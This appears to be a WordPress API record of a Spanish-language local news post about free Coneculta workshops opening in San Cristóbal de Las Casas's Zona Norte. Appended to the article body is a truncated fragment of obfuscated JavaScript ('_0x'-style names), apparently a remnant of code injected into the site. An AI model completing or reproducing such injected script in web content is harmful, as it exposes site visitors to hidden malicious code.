{"id":5921,"date":"2022-10-18T02:40:26","date_gmt":"2022-10-18T02:40:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5921"},"modified":"2022-10-18T02:40:27","modified_gmt":"2022-10-18T02:40:27","slug":"activan-talleres-en-la-zona-norte-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5921","title":{"rendered":"Activan talleres en la zona Norte de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"674\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-17-at-4.40.26-PM-1024x674.jpeg\" alt=\"\" class=\"wp-image-5922\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-17-at-4.40.26-PM-1024x674.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-17-at-4.40.26-PM-300x197.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-17-at-4.40.26-PM-768x505.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-17-at-4.40.26-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-17-at-4.40.26-PM.jpeg 1067w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- A partir de esta semana se han activado los talleres gratuitos en la Casa de la Cultura de la Zona Norte, lo cual forma parte del Programa de Reconstrucci\u00f3n del Tejido Social, en coordinaci\u00f3n con el Consejo Estatal para la Cultura y las Artes (Coneculta), inform\u00f3 Emilio G\u00f3mez Ozuna. \u201cNos hemos sumado al programa de Reconstrucci\u00f3n del Tejido Social y como Coneculta somos una de las instituciones que es parte de esta iniciativa de la Secretar\u00eda de Gobierno, se sumaron unas 40 instituciones y es Coneculta que comienza con los talleres, tenemos  8, las inscripciones se encuentran abiertas y ojal\u00e1 la gente de la Zona Norte se acerque a la casa de la cultura\u201d, se\u00f1al\u00f3 en entrevista. G\u00f3mez Ozuna destac\u00f3 que cuentan con talleres como pintura, reciclado, m\u00e1scaras, fomento a la lectura, entre otros, con una serie de maestros profesionales, \u201ceste s\u00e1bado se abri\u00f3 el taller de fotograf\u00eda y video con Marco Gir\u00f3n, hay un colectivo representantes de la Zona que se encuentran apoyando, tenemos 20 voluntarios de la Universidad San Marcos que nos est\u00e1n ayudando con perfil en pedagog\u00eda\u201d. Asimismo, dijo que van a hacer unos murales y reconoci\u00f3 que el Ayuntamiento de San Crist\u00f3bal se encuentra abriendo las puertas a todas las instituciones, ya que tambi\u00e9n habr\u00e1 jornadas de salud, talleres de ecolog\u00eda y esperan la visita de varias escuelas. Cuestionado sobre la efectividad de este programa, ejemplific\u00f3 que el domingo inauguraron un mural en el Centro Cultural del Carmen, realizado por un grupo de 6 pintores, \u201ccuatro de ellos son de la Zona Norte, muchachos que necesitaban un espacio y que fueron abandonados por las pol\u00edticas p\u00fablicas de hace a\u00f1os\u201d. \u201cNunca se pens\u00f3 como se est\u00e1 pensando ahora, lo que quieren los j\u00f3venes son espacios, no podemos decir que est\u00e1n en descomposici\u00f3n, ha sido la sociedad que no ha atendido a los j\u00f3venes, llevo a\u00f1os trabajando con ellos, y los hemos podido acompa\u00f1ar a redirigir su camino\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- A partir de esta semana se han activado los talleres gratuitos en la Casa de la Cultura de la Zona Norte, lo cual forma parte del Programa de Reconstrucci\u00f3n del Tejido Social, en coordinaci\u00f3n con el Consejo Estatal para la Cultura y las Artes (Coneculta), inform\u00f3 Emilio G\u00f3mez Ozuna. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5922,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5921","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5921"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5921\/revisions"}],"predecessor-version":[{"id":5923,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5921\/revisions\/5923"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5922"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5921"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}